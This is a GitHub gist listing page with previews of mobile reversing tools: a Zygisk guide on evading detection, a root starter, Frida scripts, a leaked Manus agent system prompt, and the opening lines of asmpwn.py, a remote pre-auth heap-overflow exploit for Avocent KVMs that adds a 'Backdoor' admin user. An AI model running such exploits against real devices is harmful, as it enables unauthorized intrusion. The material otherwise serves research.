Skip to content

Instantly share code, notes, and snippets.

View apkunpacker's full-sized avatar

ApkUnpacker apkunpacker

671 followers · 121 following
View GitHub Profile
@ThePedroo
ThePedroo / THEPEDROO_ZYGISK_MODULE_GUIDE.md
Created March 29, 2026 06:29
ThePedroo's Zygisk Module Guide

ThePedroo's Zygisk Module Guide

The Zygisk API is fairly easy to understand: two main functions, 4 functions that are set on runtime, pre and post for both apps and system server. However, when you get more into the development of a Zygisk module, it gets significantly harder to know how to improve the module in terms of efficiency, and how to avoid detections, after all there are no (properly) documented resources for either.

This post/guide, written by ReZygisk's developer, documents numerous information (and that are actually valuable) that allow to build a better Zygisk module, improving hiding and performance/speed.

1. Untargeted processes; Minimal execution

Many Zygisk modules have specific targets, and aren't meant to execute on other processes. It is common for many to also need to execute a considerable amount of code preparing for later execution. However, it is important to check, as the first real step, in preAppSpecialize, if you actually need to run any code in that process.

@MhmRdd
MhmRdd / shizuku_starter.c
Created March 8, 2026 17:32
/*
* shizuku_starter.c
*
* Starts Shizuku server with root privileges.
* Intended to be executed via Xiaomi IMQSNative service.
*
*
* Compile (Termux):
* clang -O2 -Wall -o /data/local/tmp/shizuku_starter shizuku_starter.c
*
@MhmRdd
MhmRdd / provision_device_ids.c
Created March 1, 2026 02:28
Standalone Device ID provisioning utility for Qualcomm Keymaster
/*
* provision_device_ids.c
* Copyright (c) 2026 mhmrdd. All rights reserved.
*
* Standalone Device ID provisioning utility for Qualcomm Keymaster.
*
* This tool provisions Android attestation identifiers (brand, device,
* product, serial, IMEI/MEID, manufacturer, model) into secure storage
* through QSEECom and finalizes Device ID provisioning state.
*
@jlia0
jlia0 / agent loop
Last active May 7, 2026 14:27
Manus tools and prompts
You are Manus, an AI agent created by the Manus team.
You excel at the following tasks:
1. Information gathering, fact-checking, and documentation
2. Data processing, analysis, and visualization
3. Writing multi-chapter articles and in-depth research reports
4. Creating websites, applications, and tools
5. Using programming to solve various problems beyond development
6. Various tasks that can be accomplished using computers and the internet
@Ahmeth4n
Ahmeth4n / pairip_analysis.js
Created March 2, 2025 20:44
simple PairIP executeVM() analyzer frida script.
function hookNative() {
const jniOnLoad = moduleHandle.findExportByName("JNI_OnLoad");
if (!jniOnLoad) {
console.log("[-] JNI_OnLoad not found!");
return;
}
console.log("[+] JNI_OnLoad founded:", jniOnLoad);
@miticollo
miticollo / build_frida.sh
Last active April 28, 2026 03:24
How to build frida-server (≥ 16.2.2) for iOS jailbroken devices
#!/usr/bin/env bash
#
# Build Frida DEB.
# register the cleanup function to be called on the EXIT signal
trap cleanup INT
#######################################
# Deletes the temp directory.
# Globals:
@aemmitt-ns
aemmitt-ns / asmpwn.py
Last active December 30, 2023 15:08
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
import socket, struct, sys
p32 = lambda x: struct.pack(">I", x)
p16 = lambda x: struct.pack(">h", x)
p8 = lambda x: struct.pack(">b", x)
# ASMP heap overflow exploit creates new applianceAdmin user
def exploit(hostname, username="Backdoor", password="Backdoor"):
global socks # python closes out of scope sockets
port = 3211 # port is hardcoded in the binary
usernm = username.encode()
@jevinskie
jevinskie / example.txt
Created July 14, 2023 02:34
xnu-unsuspend
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *]
-> % sudo taskinfo 'Deliveries Widget'
process: "Deliveries Widget" [30145] [unique ID: 1220404]
architecture: arm64
coalition (type 0) ID: 105936
coalition (type 1) ID: 591
suspend count: 1
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB
run time: 42 s
user/system time (current threads): 0.046565 s / 0.036279 s
@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@miticollo
miticollo / permissions.py
Created May 9, 2023 01:07
A frida agent to reset all permissions on specific app. This work is based on https://github.com/FouadRaheb/AppData.
#!/usr/bin/env python3
import json
import frida
from frida.core import Device, Session, Script, ScriptExportsSync
compiler: frida.Compiler = frida.Compiler()
compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}"))
bundle: str = compiler.build('permissions.ts', compression='terser')